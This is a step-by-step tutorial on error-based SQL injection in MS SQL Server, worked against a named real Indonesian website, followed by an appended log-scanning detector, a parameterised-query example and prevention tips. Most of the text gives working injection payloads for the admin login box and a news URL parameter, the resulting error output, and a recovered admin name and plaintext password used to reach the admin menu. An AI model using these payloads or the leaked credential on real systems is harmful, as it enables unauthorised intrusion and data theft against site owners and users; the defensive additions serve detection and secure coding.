MS SQL Injection, step by step
Lately you have probably often heard the term "SQL Injection". Do you know how dangerous this bug is?
We will present SQL Injection step by step.
Note: we will restrict the discussion to SQL Injection in MS-SQL Server.
We'll take the site www.pln-wilkaltim.co.id as the example.
There are two weaknesses on this site, namely:
1. The News table
2. The Admin table
The first step is to determine which holes can be injected, by enumerating the inputs the site uses.
We will find two kinds of input parameters: input entered through a form box, and input passed through the URL address.
We take the easiest first, the input box. We look for the admin login box and find it at www.pln-wilkaltim.co.id/sipm/admin/admin.asp. The first step is determining the table name and its field names; we inject the NIP box with the command (the password is up to you):
' having 1=1--
Do not forget to write the single quote and the double hyphen (important). The meaning of these two signs can be seen in the www.neoteker.or.id SQL Injection tutorial. Then the following error message will come out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Our first field name comes out.
Note the table name: T_ADMIN
Note the field name: NOMOR
Then we will find the next field name, along with its table name, which may be different.
We inject the NIP box (the password is up to you):
' group by T_ADMIN.NOMOR having 1=1--
The error message that comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
This gives the table name and our second field.
Record: T_ADMIN.NIP
Then we find our third field:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
The error message that comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Record the third field: T_ADMIN.PASSWORD
Repeat the steps above until we find the last field.
Here is the message that appears if we check the last field by injecting:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(note: the command must be written on one line, not broken across lines)
--------------------
- nip or password or you have the wrong units !! -
--------------------
We have successfully found the last field.
List of columns (fields):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
There is only one table for this authentication (i.e. T_ADMIN),
which makes our process easier.
The next step is to determine the data types of the fields above.
We inject in the box (password up to you):
' union select sum(NOMOR) from T_ADMIN--
The meaning of the query: we try to apply the sum clause before the server determines whether the number of columns in the two rowsets is the same.
Put simply, the sum (total) clause only applies to numeric column types, so for a non-numeric column an error will come out that tells us the type of the relevant column.
Error message:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
This means the type of this column (NOMOR) is numeric.
Next we inject:
' union select sum(NIP) from T_ADMIN--
The error message that comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
This means the NIP column type is char.
We repeat the above command for the next column by replacing nama_kolom (column name) in:
' union select sum(nama_kolom) from T_ADMIN--
with the next column, and we get the column types:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
The next step: we search for the contents of the password field for the admin user, by injecting:
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
This means we choose the minimum user name greater than 'a' and try to convert it to integer type. The six 1s mean that we select only the NAMA column and ignore the other six columns.
Going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
You see:
varchar value 'bill '
'bill' is the user name in the last record entered, i.e. the NAMA column of the last record inserted.
Next, we inject:
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill'--
(note: write it on one line)
The error message that comes out:
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
This means we succeeded.
We get:
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u
Please log in at:
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
with the above account; the branch (unit) field you have to fill in yourself by trial and error,
or we just use the shortcut.
We inject:
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
(note: write it on one line)
This goes directly to the admin menu.
Remember: do not make mischief! Inform the admin!
The second hole is in the news. The news content basically comes from another table.
So we can still inject! The difference is that we must enter the parameters in the URL address.
Example:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
There are the parameters id and idSM.
When we try injecting, the parameter that has an effect is id.
We inject:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
The error message that comes out:
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
This means 'tb_news.NewsId' is our first table and column.
We repeat the steps above to get:
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime
Well, the rest is your own work to develop your knowledge.
You can enter content that you determine yourself.
This is why these holes in MS-SQL Server are very dangerous.
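As an added defender-side example (not part of the original tutorial): the error-based enumeration walked through above leaves a recognisable trail in the web server log. The script below, written for this edit, classifies constructed W3C-style log lines by which probe they carry; the log format, paths and timestamps are assumptions, and because the NIP-box injections travel in POST bodies, for those only the burst of server errors is visible.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the three probe shapes used in the enumeration above.
PROBE_PATTERNS = {
    "having-probe": re.compile(r"'\s*having\s+1\s*=\s*1", re.I),
    "groupby-walk": re.compile(r"'\s*group\s+by\s+[\w.,\s]+having", re.I),
    "union-typecheck": re.compile(r"'\s*union\s+select\s+(sum|min|max)\s*\(", re.I),
}

# Constructed W3C-style lines: date time method uri-stem uri-query status.
SAMPLE_LOG = """\
2003-05-01 10:01:02 GET /dari_Media.asp id=2119&idm=40&idSM=2 200
2003-05-01 10:02:11 GET /dari_Media.asp id=2119%27%20having%201=1-- 500
2003-05-01 10:03:40 POST /sipm/admin/dologin.asp - 500
2003-05-01 10:04:05 GET /dari_Media.asp id=2119'%20group%20by%20tb_news.NewsId%20having%201=1-- 500
2003-05-01 10:05:30 GET /dari_Media.asp id=2119'%20union%20select%20sum(NewsId)%20from%20tb_news-- 500
"""

def classify(line):
    """Return a finding dict for one log line, or None if no probe matches."""
    parts = line.split()
    if len(parts) < 6:
        return None
    date, time, method, stem, query, status = parts[:6]
    decoded = unquote_plus(query)  # logs keep URL encoding; match the decoded form
    hits = [name for name, pat in PROBE_PATTERNS.items() if pat.search(decoded)]
    if not hits:
        return None
    return {"time": f"{date} {time}", "method": method, "path": stem,
            "status": int(status), "probes": hits}

def scan(log_text):
    """All probe findings in a log, in file order."""
    return [f for f in map(classify, log_text.splitlines()) if f]

def error_count_by_path(log_text):
    """Weaker signal that also covers the NIP box: its payload is in the POST
    body and never reaches the query-string column, so only the server errors
    it triggers (status 500) are visible per script."""
    counts = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) >= 6 and parts[5] == "500":
            counts[parts[3]] = counts.get(parts[3], 0) + 1
    return counts
```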
=========================================
Specially for ADMIN & WEB PROGRAMMER !!!
========================================
Common prevention strategies used:
1. Limit the length of the input box (if possible) in the source code, so a beginner cracker will be confused for a moment when he sees that the input box cannot be injected with a long command.
2. Filter the input entered by the user, especially the use of single quotes (input validation).
3. Turn off or hide the error messages from the running SQL Server.
4. Turn off standard facilities such as stored procedures and extended stored procedures if possible.
5. Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.
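As an added example (not the site's code): point 2 done properly means binding parameters rather than filtering quotes, and point 3 is why the concatenated form is so dangerous when errors are shown. The snippet below rebuilds the dologin.asp lookup both ways against an in-memory SQLite copy of T_ADMIN; SQLite standing in for MS SQL Server, the column types and the demo record are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed stand-in for the tutorial's T_ADMIN table (same column names).
SCHEMA = """CREATE TABLE T_ADMIN (
    NOMOR INTEGER PRIMARY KEY, NIP TEXT, PASSWORD TEXT, NAMA TEXT,
    KD_RANTING TEXT, ADDRESS TEXT, EMAIL TEXT)"""

def _pw_hash(password: str, salt: bytes) -> str:
    # Store a salted PBKDF2 hash, not the plaintext the tutorial recovers.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000).hex()

def make_db() -> sqlite3.Connection:
    """In-memory database with one constructed admin record."""
    con = sqlite3.connect(":memory:")
    con.execute(SCHEMA)
    salt = os.urandom(16)
    stored = salt.hex() + ":" + _pw_hash("demo-pass", salt)
    con.execute("INSERT INTO T_ADMIN VALUES (1, ?, ?, 'demo', 'R01', '', '')",
                ("demo-nip", stored))
    return con

def vulnerable_login(con: sqlite3.Connection, nip: str, password: str):
    """String concatenation as in the tutorial's dologin.asp: the box contents
    become SQL text. Returns the database error text an unhidden error page
    would leak (the oracle the tutorial reads), or None if the statement ran."""
    sql = f"SELECT * FROM T_ADMIN WHERE NIP='{nip}' AND PASSWORD='{password}'"
    try:
        con.execute(sql).fetchall()
        return None
    except sqlite3.Error as exc:
        return str(exc)

def safe_login(con: sqlite3.Connection, nip: str, password: str) -> bool:
    """Bound parameter: the input is data, the statement shape cannot change."""
    row = con.execute("SELECT PASSWORD FROM T_ADMIN WHERE NIP = ?", (nip,)).fetchone()
    if row is None:
        return False
    salt_hex, stored = row[0].split(":", 1)
    candidate = _pw_hash(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, stored)
```

With the tutorial's ' union select sum(NOMOR) from T_ADMIN-- typed into the NIP box, the concatenated version fails with the column-count mismatch error while the bound version simply finds no such NIP.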
Well, that is about all I can tell .....
This is a picture of how insecure the Internet is ...
If you want to be more secure, unplug your network cable, remove your disk drives and your hard drive, and sell your computer!
Just kidding :)